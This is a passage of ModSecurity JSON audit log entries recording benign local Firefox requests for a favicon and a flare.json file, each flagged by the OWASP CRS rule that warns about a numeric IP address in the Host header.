\"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIoAAAAF\"]"],"stopwatch":{"p1":417,"p2":1153,"p3":51,"p4":291,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIsAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcHrX8AAQEAAAmHBIsAAAAF\"]"],"stopwatch":{"p1":410,"p2":939,"p3":47,"p4":394,"p5":49,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RIAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RIAAAAB\"]"],"stopwatch":{"p1":462,"p2":963,"p3":44,"p4":260,"p5":59,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:03 --0400","transaction_id":"WRcIt38AAQEAAAkW4RMAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcIt38AAQEAAAkW4RMAAAAB\"]"],"stopwatch":{"p1":502,"p2":891,"p3":47,"p4":252,"p5":53,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:23:04 --0400","transaction_id":"WRcIuH8AAQEAAAkW4RQAAAAB","remote_address":"127.0.0.1","remote_port":41752,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:22:58 GMT","ETag":"\"21-54f67b8770b5d\"","Accept-Ranges":"bytes","Content-Length":"33","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcIuH8AAQEAAAkW4RQAAAAB\"]"],"stopwatch":{"p1":392,"p2":1541,"p3":90,"p4":207,"p5":90,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs98AAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:34:58 GMT","ETag":"\"65-54f67e363bf86\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLhn8AAQEAAAkXs98AAAAC\"]"],"stopwatch":{"p1":732,"p2":1341,"p3":166,"p4":160,"p5":63,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@AAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@AAAAAC\"]"],"stopwatch":{"p1":391,"p2":881,"p3":47,"p4":373,"p5":54,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:02 --0400","transaction_id":"WRcLhn8AAQEAAAkXs@EAAAAC","remote_address":"127.0.0.1","remote_port":41784,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLhn8AAQEAAAkXs@EAAAAC\"]"],"stopwatch":{"p1":485,"p2":941,"p3":44,"p4":241,"p5":51,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:51 --0400","transaction_id":"WRcLt38AAQEAAAkYuEMAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:34:58 GMT","If-None-Match":"\"65-54f67e363bf86\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:35:49 GMT","ETag":"\"65-54f67e66856bf\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcLt38AAQEAAAkYuEMAAAAD\"]"],"stopwatch":{"p1":455,"p2":1109,"p3":131,"p4":232,"p5":55,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEQAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEQAAAAD\"]"],"stopwatch":{"p1":378,"p2":800,"p3":147,"p4":250,"p5":50,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
